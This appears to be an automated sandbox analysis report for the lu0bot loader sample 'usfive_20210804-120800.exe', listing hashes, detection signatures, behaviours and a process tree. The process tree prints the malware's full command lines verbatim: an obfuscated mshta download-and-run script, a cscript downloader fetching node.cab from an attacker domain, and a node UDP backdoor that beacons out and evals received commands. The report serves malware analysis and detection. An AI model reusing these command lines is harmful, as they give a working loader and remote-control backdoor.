Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
04-08-2021 10:12
Static task
static1
Behavioral task
behavioral1
Sample
usfive_20210804-120800.exe
Resource
win7v20210410
General
-
Target
usfive_20210804-120800.exe
-
Size
2KB
-
MD5
ae597b5df58ab4f01867bb5eaac93efd
-
SHA1
c8a13f566a130f18507e824e1e5c167b186a65a7
-
SHA256
a565b1d26d7c7ea28aad5f1c23fb5c055198d200147589c7dc36e3e1fa13e119
-
SHA512
fd978db8ff6d1fc7625ec996938022d3e191a5b58d7dcd0a430f80e1558f4986aaaeff2cc57f0d21451905d24494f7c5581b349e2d75d28a77e5430309f13afa
Malware Config
Signatures
-
suricata: ET MALWARE lu0bot Loader HTTP Request
-
suricata: ET MALWARE lu0bot Loader HTTP Response
-
Blocklisted process makes network request 2 IoCs
flow pid Process 11 1548 mshta.exe 12 2064 cscript.exe -
Executes dropped EXE 1 IoCs
pid Process 2120 node.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 532 icacls.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1684 tasklist.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 2900 ipconfig.exe 2100 netstat.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1512 systeminfo.exe -
NTFS ADS 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Temp\deefb1bdafb71417:ads node.exe File created C:\ProgramData\DNTException\node.exe:c499f047c0fdd7a9d6397d37a946a996 node.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 11 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2120 node.exe 2120 node.exe 2120 node.exe 2120 node.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeDebugPrivilege 1684 tasklist.exe Token: SeIncreaseQuotaPrivilege 2724 wmic.exe Token: SeSecurityPrivilege 2724 wmic.exe Token: SeTakeOwnershipPrivilege 2724 wmic.exe Token: SeLoadDriverPrivilege 2724 wmic.exe Token: SeSystemProfilePrivilege 2724 wmic.exe Token: SeSystemtimePrivilege 2724 wmic.exe Token: SeProfSingleProcessPrivilege 2724 wmic.exe Token: SeIncBasePriorityPrivilege 2724 wmic.exe Token: SeCreatePagefilePrivilege 2724 wmic.exe Token: SeBackupPrivilege 2724 wmic.exe Token: SeRestorePrivilege 2724 wmic.exe Token: SeShutdownPrivilege 2724 wmic.exe Token: SeDebugPrivilege 2724 wmic.exe Token: SeSystemEnvironmentPrivilege 2724 wmic.exe Token: SeRemoteShutdownPrivilege 2724 wmic.exe Token: SeUndockPrivilege 2724 wmic.exe Token: SeManageVolumePrivilege 2724 wmic.exe Token: 33 2724 wmic.exe Token: 34 2724 wmic.exe Token: 35 2724 wmic.exe Token: 36 2724 wmic.exe Token: SeIncreaseQuotaPrivilege 2724 wmic.exe Token: SeSecurityPrivilege 2724 wmic.exe Token: SeTakeOwnershipPrivilege 2724 wmic.exe Token: SeLoadDriverPrivilege 2724 wmic.exe Token: SeSystemProfilePrivilege 2724 wmic.exe Token: SeSystemtimePrivilege 2724 wmic.exe Token: SeProfSingleProcessPrivilege 2724 wmic.exe Token: SeIncBasePriorityPrivilege 2724 wmic.exe Token: SeCreatePagefilePrivilege 2724 wmic.exe Token: SeBackupPrivilege 2724 wmic.exe Token: SeRestorePrivilege 2724 wmic.exe Token: SeShutdownPrivilege 2724 wmic.exe Token: SeDebugPrivilege 2724 wmic.exe Token: SeSystemEnvironmentPrivilege 2724 wmic.exe Token: SeRemoteShutdownPrivilege 2724 wmic.exe Token: SeUndockPrivilege 2724 wmic.exe Token: SeManageVolumePrivilege 2724 wmic.exe Token: 33 2724 wmic.exe Token: 34 2724 wmic.exe Token: 35 2724 wmic.exe Token: 36 2724 wmic.exe Token: SeDebugPrivilege 2100 netstat.exe -
Suspicious use of WriteProcessMemory 51 IoCs
description pid Process procid_target PID 532 wrote to memory of 1548 532 usfive_20210804-120800.exe 74 PID 532 wrote to memory of 1548 532 usfive_20210804-120800.exe 74 PID 532 wrote to memory of 1548 532 usfive_20210804-120800.exe 74 PID 1548 wrote to memory of 3340 1548 mshta.exe 76 PID 1548 wrote to memory of 3340 1548 mshta.exe 76 PID 1548 wrote to memory of 3340 1548 mshta.exe 76 PID 3340 wrote to memory of 2064 3340 cmd.exe 78 PID 3340 wrote to memory of 2064 3340 cmd.exe 78 PID 3340 wrote to memory of 2064 3340 cmd.exe 78 PID 3340 wrote to memory of 3032 3340 cmd.exe 79 PID 3340 wrote to memory of 3032 3340 cmd.exe 79 PID 3340 wrote to memory of 3032 3340 cmd.exe 79 PID 3340 wrote to memory of 3324 3340 cmd.exe 80 PID 3340 wrote to memory of 3324 3340 cmd.exe 80 PID 3340 wrote to memory of 3324 3340 cmd.exe 80 PID 3324 wrote to memory of 2120 3324 cscript.exe 81 PID 3324 wrote to memory of 2120 3324 cscript.exe 81 PID 3324 wrote to memory of 2120 3324 cscript.exe 81 PID 2120 wrote to memory of 2484 2120 node.exe 85 PID 2120 wrote to memory of 2484 2120 node.exe 85 PID 2120 wrote to memory of 2484 2120 node.exe 85 PID 2120 wrote to memory of 2548 2120 node.exe 86 PID 2120 wrote to memory of 2548 2120 node.exe 86 PID 2120 wrote to memory of 2548 2120 node.exe 86 PID 2120 wrote to memory of 532 2120 node.exe 87 PID 2120 wrote to memory of 532 2120 node.exe 87 PID 2120 wrote to memory of 532 2120 node.exe 87 PID 2120 wrote to memory of 2788 2120 node.exe 88 PID 2120 wrote to memory of 2788 2120 node.exe 88 PID 2120 wrote to memory of 2788 2120 node.exe 88 PID 2120 wrote to memory of 3024 2120 node.exe 89 PID 2120 wrote to memory of 3024 2120 node.exe 89 PID 2120 wrote to memory of 3024 2120 node.exe 89 PID 2120 wrote to memory of 1684 2120 node.exe 91 PID 2120 wrote to memory of 1684 2120 node.exe 91 PID 2120 wrote to memory of 1684 2120 node.exe 91 PID 2120 wrote to memory of 2724 2120 node.exe 92 PID 2120 wrote to memory of 2724 2120 node.exe 92 PID 2120 wrote to memory of 2724 2120 node.exe 92 PID 2120 wrote to memory of 2900 2120 node.exe 93 PID 2120 wrote to memory of 2900 2120 node.exe 93 PID 2120 wrote to memory of 2900 2120 node.exe 93 PID 2120 wrote to memory of 3032 2120 node.exe 94 PID 2120 wrote to memory of 3032 2120 node.exe 94 PID 2120 wrote to memory of 3032 2120 node.exe 94 PID 2120 wrote to memory of 2100 2120 node.exe 95 PID 2120 wrote to memory of 2100 2120 node.exe 95 PID 2120 wrote to memory of 2100 2120 node.exe 95 PID 2120 wrote to memory of 1512 2120 node.exe 96 PID 2120 wrote to memory of 1512 2120 node.exe 96 PID 2120 wrote to memory of 1512 2120 node.exe 96 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2788 attrib.exe 3024 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\usfive_20210804-120800.exe"C:\Users\Admin\AppData\Local\Temp\usfive_20210804-120800.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();159;y=unescape('%361%7Eh%74t%70%3A%2F%2F%61s%750%37%2E%66u%6E%2F%68r%69%2F%3F2%31a%36e%34b%7E2%31').split('~');56;try{x='WinHttp';176;x=new ActiveXObject(x+'.'+x+'Request.5.1');175;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);251;x.send();120;y='ipt.S';132;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);32;}catch(e){};239;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1628071956320.txt & cscript /nologo /e:jscript get1628071956320.txt "http%3A%2F%2Fasu07.fun%2Fhri%2F%3F22ce76d60%26b%3D1c63848f" node.cab & expand node.cab node.exe & del get1628071956320.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1628071956320.txt & cscript /nologo /e:jscript get1628071956320.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1628071956320.txt3⤵
- Suspicious use of WriteProcessMemory
PID:3340 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1628071956320.txt "http%3A%2F%2Fasu07.fun%2Fhri%2F%3F22ce76d60%26b%3D1c63848f" node.cab4⤵
- Blocklisted process makes network request
PID:2064
-
-
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
PID:3032
-
-
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1628071956320.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%272ce76d60%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu07.fun%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\cmd.execmd.exe /c dir C:\6⤵PID:2484
-
-
C:\Windows\SysWOW64\cacls.execacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F6⤵PID:2548
-
-
C:\Windows\SysWOW64\icacls.exeicacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)6⤵
- Modifies file permissions
PID:532
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException6⤵
- Views/modifies file attributes
PID:2788
-
-
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException\node.exe6⤵
- Views/modifies file attributes
PID:3024
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /fo csv /nh6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic process get processid,parentprocessid,name,executablepath /format:csv6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig.exe /all6⤵
- Gathers network information
PID:2900
-
-
C:\Windows\SysWOW64\route.exeroute.exe print6⤵PID:3032
-
-
C:\Windows\SysWOW64\netstat.exenetstat.exe -ano6⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo.exe /fo csv6⤵
- Gathers system information
PID:1512
-
-
-
-
-